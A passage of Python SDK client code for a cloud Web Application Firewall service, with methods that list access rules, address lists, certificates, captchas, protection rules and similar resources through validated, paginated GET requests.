    # Path templating values; blank or None identifiers are invalid.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Pagination controls are passed through as query parameters.
    query_params = {
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing)
    }
    query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )
    # Shared call arguments; header_params is held by reference, so the
    # retry-header mutation below is still visible to the call.
    call_kwargs = dict(
        resource_path="/waasPolicies/{waasPolicyId}/wafConfig/accessRules",
        method="GET",
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="list[AccessRule]")
    if strategy:
        if not isinstance(strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_address_lists(self, compartment_id, **kwargs):
    """
    Gets a list of address lists that can be used in a WAAS policy.

    :param str compartment_id: (required)
        The `OCID`__ of the compartment. This number is generated when the
        compartment is created.

        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; quote it when contacting
        Oracle about this particular request.

    :param int limit: (optional)
        Maximum number of items per paginated call. Defaults to `10` when
        unspecified.

    :param str page: (optional)
        The `opc-next-page` response header value from the previous
        paginated call.

    :param str sort_by: (optional)
        Sort field for the paginated 'List' call. Defaults to `timeCreated`
        when unspecified.

        Allowed values are: "id", "name", "timeCreated"

    :param str sort_order: (optional)
        Sorting direction for the paginated 'List' call. Defaults to `DESC`
        when unspecified.

        Allowed values are: "ASC", "DESC"

    :param list[str] id: (optional)
        Filter address lists using a list of address lists OCIDs.

    :param list[str] name: (optional)
        Filter address lists using a list of names.

    :param list[str] lifecycle_state: (optional)
        Filter address lists using a list of lifecycle states.

        Allowed values are: "CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"

    :param datetime time_created_greater_than_or_equal_to: (optional)
        Match address lists created on or after the specified date-time.

    :param datetime time_created_less_than: (optional)
        Match address lists created before the specified date-time.

    :param obj retry_strategy: (optional)
        A per-operation retry strategy that overrides the client-level one.
        Use one of the strategies from the :py:mod:`~oci.retry` module; this
        operation does not retry by default. Pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings.
        Disallowed by default.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.AddressListSummary`
    :rtype: :class:`~oci.response.Response`
    :example:

    Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_address_lists.py.html>`__ to see an example of how to use list_address_lists API.
    """
    # Reject any keyword argument this operation does not understand.
    accepted_kwargs = {
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page",
        "sort_by",
        "sort_order",
        "id",
        "name",
        "lifecycle_state",
        "time_created_greater_than_or_equal_to",
        "time_created_less_than"
    }
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "list_address_lists got unknown kwargs: {!r}".format(unknown))

    # Validate enum-valued parameters before building the request.
    if 'sort_by' in kwargs:
        sort_by_allowed_values = ["id", "name", "timeCreated"]
        if kwargs['sort_by'] not in sort_by_allowed_values:
            raise ValueError(
                "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
            )

    if 'sort_order' in kwargs:
        sort_order_allowed_values = ["ASC", "DESC"]
        if kwargs['sort_order'] not in sort_order_allowed_values:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
            )

    # lifecycle_state is a multi-valued filter: check every element.
    if 'lifecycle_state' in kwargs:
        lifecycle_state_allowed_values = ["CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"]
        for state in kwargs['lifecycle_state']:
            if state not in lifecycle_state_allowed_values:
                raise ValueError(
                    "Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
                )

    # List-valued filters are serialized with the 'multi' collection format.
    query_params = {
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortBy": kwargs.get("sort_by", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "compartmentId": compartment_id,
        "id": self.base_client.generate_collection_format_param(kwargs.get("id", missing), 'multi'),
        "name": self.base_client.generate_collection_format_param(kwargs.get("name", missing), 'multi'),
        "lifecycleState": self.base_client.generate_collection_format_param(kwargs.get("lifecycle_state", missing), 'multi'),
        "timeCreatedGreaterThanOrEqualTo": kwargs.get("time_created_greater_than_or_equal_to", missing),
        "timeCreatedLessThan": kwargs.get("time_created_less_than", missing)
    }
    query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )
    # Shared call arguments; header_params is held by reference, so the
    # retry-header mutation below is still visible to the call.
    call_kwargs = dict(
        resource_path="/addressLists",
        method="GET",
        query_params=query_params,
        header_params=header_params,
        response_type="list[AddressListSummary]")
    if strategy:
        if not isinstance(strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_caching_rules(self, waas_policy_id, **kwargs):
    """
    Gets the currently configured caching rules for the Web Application
    Firewall configuration of a specified WAAS policy.

    The rules are processed in the order they are specified in, and the
    first matching rule is used when processing a request.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; quote it when contacting
        Oracle about this particular request.

    :param int limit: (optional)
        Maximum number of items per paginated call. Defaults to `10` when
        unspecified.

    :param str page: (optional)
        The `opc-next-page` response header value from the previous
        paginated call.

    :param obj retry_strategy: (optional)
        A per-operation retry strategy that overrides the client-level one.
        Use one of the strategies from the :py:mod:`~oci.retry` module; this
        operation does not retry by default. Pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings.
        Disallowed by default.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.CachingRuleSummary`
    :rtype: :class:`~oci.response.Response`
    :example:

    Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_caching_rules.py.html>`__ to see an example of how to use list_caching_rules API.
    """
    # Reject any keyword argument this operation does not understand.
    accepted_kwargs = {
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page"
    }
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "list_caching_rules got unknown kwargs: {!r}".format(unknown))

    # Path templating values; blank or None identifiers are invalid.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Pagination controls are passed through as query parameters.
    query_params = {
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing)
    }
    query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )
    # Shared call arguments; header_params is held by reference, so the
    # retry-header mutation below is still visible to the call.
    call_kwargs = dict(
        resource_path="/waasPolicies/{waasPolicyId}/wafConfig/cachingRules",
        method="GET",
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="list[CachingRuleSummary]")
    if strategy:
        if not isinstance(strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_captchas(self, waas_policy_id, **kwargs):
    """
    Gets the list of currently configured CAPTCHA challenges in the Web
    Application Firewall configuration of a WAAS policy.

    The order of the CAPTCHA challenges is important: the URL for each
    CAPTCHA is checked in the order they are created.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        Unique Oracle-assigned request identifier; quote it when contacting
        Oracle about this particular request.

    :param int limit: (optional)
        Maximum number of items per paginated call. Defaults to `10` when
        unspecified.

    :param str page: (optional)
        The `opc-next-page` response header value from the previous
        paginated call.

    :param obj retry_strategy: (optional)
        A per-operation retry strategy that overrides the client-level one.
        Use one of the strategies from the :py:mod:`~oci.retry` module; this
        operation does not retry by default. Pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in response strings.
        Disallowed by default.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.Captcha`
    :rtype: :class:`~oci.response.Response`
    :example:

    Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_captchas.py.html>`__ to see an example of how to use list_captchas API.
    """
    # Reject any keyword argument this operation does not understand.
    accepted_kwargs = {
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page"
    }
    unknown = [name for name in six.iterkeys(kwargs) if name not in accepted_kwargs]
    if unknown:
        raise ValueError(
            "list_captchas got unknown kwargs: {!r}".format(unknown))

    # Path templating values; blank or None identifiers are invalid.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
    for (name, value) in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Pagination controls are passed through as query parameters.
    query_params = {
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing)
    }
    query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )
    # Shared call arguments; header_params is held by reference, so the
    # retry-header mutation below is still visible to the call.
    call_kwargs = dict(
        resource_path="/waasPolicies/{waasPolicyId}/wafConfig/captchas",
        method="GET",
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="list[Captcha]")
    if strategy:
        if not isinstance(strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_certificates(self, compartment_id, **kwargs):
    """
    Gets a list of SSL certificates that can be used in a WAAS policy.

    :param str compartment_id: (required)
        The `OCID`__ of the compartment. This number is generated when the compartment is created.

        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when contacting Oracle about a particular request.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. Defaults to `10` when unspecified.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param str sort_by: (optional)
        The field by which certificate summaries are sorted in a paginated 'List' call. Defaults to `timeCreated`.

        Allowed values are: "id", "compartmentId", "displayName", "notValidAfter", "timeCreated"

    :param str sort_order: (optional)
        The sorting direction of resources in a paginated 'List' call. Defaults to `DESC`.

        Allowed values are: "ASC", "DESC"

    :param list[str] id: (optional)
        Filter certificates using a list of certificates OCIDs.

    :param list[str] display_name: (optional)
        Filter certificates using a list of display names.

    :param list[str] lifecycle_state: (optional)
        Filter certificates using a list of lifecycle states.

        Allowed values are: "CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"

    :param datetime time_created_greater_than_or_equal_to: (optional)
        Matches certificates created on or after the specified date-time.

    :param datetime time_created_less_than: (optional)
        Matches certificates created before the specified date-time.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the
        client level. Use one of the strategies from the :py:mod:`~oci.retry` module; this operation
        does not retry by default. Pass a :py:class:`~oci.retry.NoneRetryStrategy` instance to
        explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether this request should allow control characters in the response object.
        By default, control characters are not allowed in strings.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.CertificateSummary`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_certificates.py.html>`__ to see an example of how to use list_certificates API.
    """
    resource_path = "/certificates"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    expected_kwargs = frozenset([
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page",
        "sort_by",
        "sort_order",
        "id",
        "display_name",
        "lifecycle_state",
        "time_created_greater_than_or_equal_to",
        "time_created_less_than"
    ])
    unrecognized = [name for name in kwargs if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "list_certificates got unknown kwargs: {!r}".format(unrecognized))

    # Validate enum-style parameters before building the request.
    if 'sort_by' in kwargs:
        sort_by_allowed_values = ["id", "compartmentId", "displayName", "notValidAfter", "timeCreated"]
        if kwargs['sort_by'] not in sort_by_allowed_values:
            raise ValueError(
                "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
            )

    if 'sort_order' in kwargs:
        sort_order_allowed_values = ["ASC", "DESC"]
        if kwargs['sort_order'] not in sort_order_allowed_values:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
            )

    if 'lifecycle_state' in kwargs:
        lifecycle_state_allowed_values = ["CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"]
        for state in kwargs['lifecycle_state']:
            if state not in lifecycle_state_allowed_values:
                raise ValueError(
                    "Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
                )

    # Assemble query parameters, then drop any that were not supplied.
    query_params = {
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortBy": kwargs.get("sort_by", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "compartmentId": compartment_id,
        "id": self.base_client.generate_collection_format_param(kwargs.get("id", missing), 'multi'),
        "displayName": self.base_client.generate_collection_format_param(kwargs.get("display_name", missing), 'multi'),
        "lifecycleState": self.base_client.generate_collection_format_param(kwargs.get("lifecycle_state", missing), 'multi'),
        "timeCreatedGreaterThanOrEqualTo": kwargs.get("time_created_greater_than_or_equal_to", missing),
        "timeCreatedLessThan": kwargs.get("time_created_less_than", missing)
    }
    query_params = dict((k, v) for k, v in query_params.items()
                        if v is not missing and v is not None)

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = dict((k, v) for k, v in header_params.items()
                         if v is not missing and v is not None)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # call_kwargs holds a reference to header_params, so the retry header
    # added below is still picked up by the call.
    call_kwargs = {
        "resource_path": resource_path,
        "method": method,
        "query_params": query_params,
        "header_params": header_params,
        "response_type": "list[CertificateSummary]"
    }
    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_custom_protection_rules(self, compartment_id, **kwargs):
    """
    Gets a list of custom protection rules for the specified Web Application Firewall.

    :param str compartment_id: (required)
        The `OCID`__ of the compartment. This number is generated when the compartment is created.

        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when contacting Oracle about a particular request.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. Defaults to `10` when unspecified.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param str sort_by: (optional)
        The field by which custom protection rules are sorted in a paginated 'List' call. Defaults to `timeCreated`.

        Allowed values are: "id", "compartmentId", "displayName", "modSecurityRuleId", "timeCreated"

    :param str sort_order: (optional)
        The sorting direction of resources in a paginated 'List' call. Defaults to `DESC`.

        Allowed values are: "ASC", "DESC"

    :param list[str] id: (optional)
        Filter custom protection rules using a list of custom protection rule OCIDs.

    :param list[str] display_name: (optional)
        Filter custom protection rules using a list of display names.

    :param list[str] lifecycle_state: (optional)
        Filter Custom Protection rules using a list of lifecycle states.

        Allowed values are: "CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"

    :param datetime time_created_greater_than_or_equal_to: (optional)
        Matches Custom Protection rules created on or after the specified date-time.

    :param datetime time_created_less_than: (optional)
        Matches custom protection rules created before the specified date-time.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the
        client level. Use one of the strategies from the :py:mod:`~oci.retry` module; this operation
        does not retry by default. Pass a :py:class:`~oci.retry.NoneRetryStrategy` instance to
        explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether this request should allow control characters in the response object.
        By default, control characters are not allowed in strings.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.CustomProtectionRuleSummary`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_custom_protection_rules.py.html>`__ to see an example of how to use list_custom_protection_rules API.
    """
    resource_path = "/customProtectionRules"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    expected_kwargs = frozenset([
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page",
        "sort_by",
        "sort_order",
        "id",
        "display_name",
        "lifecycle_state",
        "time_created_greater_than_or_equal_to",
        "time_created_less_than"
    ])
    unrecognized = [name for name in kwargs if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "list_custom_protection_rules got unknown kwargs: {!r}".format(unrecognized))

    # Validate enum-style parameters before building the request.
    if 'sort_by' in kwargs:
        sort_by_allowed_values = ["id", "compartmentId", "displayName", "modSecurityRuleId", "timeCreated"]
        if kwargs['sort_by'] not in sort_by_allowed_values:
            raise ValueError(
                "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
            )

    if 'sort_order' in kwargs:
        sort_order_allowed_values = ["ASC", "DESC"]
        if kwargs['sort_order'] not in sort_order_allowed_values:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
            )

    if 'lifecycle_state' in kwargs:
        lifecycle_state_allowed_values = ["CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"]
        for state in kwargs['lifecycle_state']:
            if state not in lifecycle_state_allowed_values:
                raise ValueError(
                    "Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
                )

    # Assemble query parameters, then drop any that were not supplied.
    query_params = {
        "compartmentId": compartment_id,
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortBy": kwargs.get("sort_by", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "id": self.base_client.generate_collection_format_param(kwargs.get("id", missing), 'multi'),
        "displayName": self.base_client.generate_collection_format_param(kwargs.get("display_name", missing), 'multi'),
        "lifecycleState": self.base_client.generate_collection_format_param(kwargs.get("lifecycle_state", missing), 'multi'),
        "timeCreatedGreaterThanOrEqualTo": kwargs.get("time_created_greater_than_or_equal_to", missing),
        "timeCreatedLessThan": kwargs.get("time_created_less_than", missing)
    }
    query_params = dict((k, v) for k, v in query_params.items()
                        if v is not missing and v is not None)

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = dict((k, v) for k, v in header_params.items()
                         if v is not missing and v is not None)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # call_kwargs holds a reference to header_params, so the retry header
    # added below is still picked up by the call.
    call_kwargs = {
        "resource_path": resource_path,
        "method": method,
        "query_params": query_params,
        "header_params": header_params,
        "response_type": "list[CustomProtectionRuleSummary]"
    }
    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_edge_subnets(self, **kwargs):
    """
    Return the list of the tenant's edge node subnets. Use these CIDR blocks to restrict
    incoming traffic to your origin. These subnets are owned by OCI and forward traffic to
    customer origins. They are not associated with specific regions or compartments.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when contacting Oracle about a particular request.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. Defaults to `10` when unspecified.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param str sort_by: (optional)
        The field by which edge node subnets are sorted in a paginated 'List' call. Defaults to `timeModified`.

        Allowed values are: "cidr", "region", "timeModified"

    :param str sort_order: (optional)
        The sorting direction of resources in a paginated 'List' call. Defaults to `DESC`.

        Allowed values are: "ASC", "DESC"

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the
        client level. Use one of the strategies from the :py:mod:`~oci.retry` module; this operation
        does not retry by default. Pass a :py:class:`~oci.retry.NoneRetryStrategy` instance to
        explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether this request should allow control characters in the response object.
        By default, control characters are not allowed in strings.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.EdgeSubnet`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_edge_subnets.py.html>`__ to see an example of how to use list_edge_subnets API.
    """
    resource_path = "/edgeSubnets"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    expected_kwargs = frozenset([
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page",
        "sort_by",
        "sort_order"
    ])
    unrecognized = [name for name in kwargs if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "list_edge_subnets got unknown kwargs: {!r}".format(unrecognized))

    # Validate enum-style parameters before building the request.
    if 'sort_by' in kwargs:
        sort_by_allowed_values = ["cidr", "region", "timeModified"]
        if kwargs['sort_by'] not in sort_by_allowed_values:
            raise ValueError(
                "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
            )

    if 'sort_order' in kwargs:
        sort_order_allowed_values = ["ASC", "DESC"]
        if kwargs['sort_order'] not in sort_order_allowed_values:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
            )

    # Assemble query parameters, then drop any that were not supplied.
    query_params = {
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortBy": kwargs.get("sort_by", missing),
        "sortOrder": kwargs.get("sort_order", missing)
    }
    query_params = dict((k, v) for k, v in query_params.items()
                        if v is not missing and v is not None)

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = dict((k, v) for k, v in header_params.items()
                         if v is not missing and v is not None)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # call_kwargs holds a reference to header_params, so the retry header
    # added below is still picked up by the call.
    call_kwargs = {
        "resource_path": resource_path,
        "method": method,
        "query_params": query_params,
        "header_params": header_params,
        "response_type": "list[EdgeSubnet]"
    }
    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_good_bots(self, waas_policy_id, **kwargs):
    """
    Gets the list of good bots defined in the Web Application Firewall configuration
    for a WAAS policy.

    The list is sorted by `key`, in ascending order.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when contacting Oracle about a particular request.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. Defaults to `10` when unspecified.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at the
        client level. Use one of the strategies from the :py:mod:`~oci.retry` module; this operation
        does not retry by default. Pass a :py:class:`~oci.retry.NoneRetryStrategy` instance to
        explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether this request should allow control characters in the response object.
        By default, control characters are not allowed in strings.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.GoodBot`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_good_bots.py.html>`__ to see an example of how to use list_good_bots API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/goodBots"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    expected_kwargs = frozenset([
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page"
    ])
    unrecognized = [name for name in kwargs if name not in expected_kwargs]
    if unrecognized:
        raise ValueError(
            "list_good_bots got unknown kwargs: {!r}".format(unrecognized))

    # Path parameters must be present and non-blank to build a valid URL.
    path_params = {
        "waasPolicyId": waas_policy_id
    }
    path_params = dict((k, v) for k, v in path_params.items() if v is not missing)
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Assemble query parameters, then drop any that were not supplied.
    query_params = {
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing)
    }
    query_params = dict((k, v) for k, v in query_params.items()
                        if v is not missing and v is not None)

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = dict((k, v) for k, v in header_params.items()
                         if v is not missing and v is not None)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # call_kwargs holds a reference to header_params, so the retry header
    # added below is still picked up by the call.
    call_kwargs = {
        "resource_path": resource_path,
        "method": method,
        "path_params": path_params,
        "query_params": query_params,
        "header_params": header_params,
        "response_type": "list[GoodBot]"
    }
    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
    return self.base_client.call_api(**call_kwargs)
def list_protection_rules(self, waas_policy_id, **kwargs):
    """
    Gets the list of available protection rules for a WAAS policy. Use the `GetWafConfig`
    operation to view a list of currently configured protection rules for the Web Application
    Firewall, or use the `ListRecommendations` operation to get a list of recommended
    protection rules for the Web Application Firewall.

    The list is sorted by `key`, in ascending order.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when contacting Oracle about a particular request.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. Defaults to `10` when unspecified.

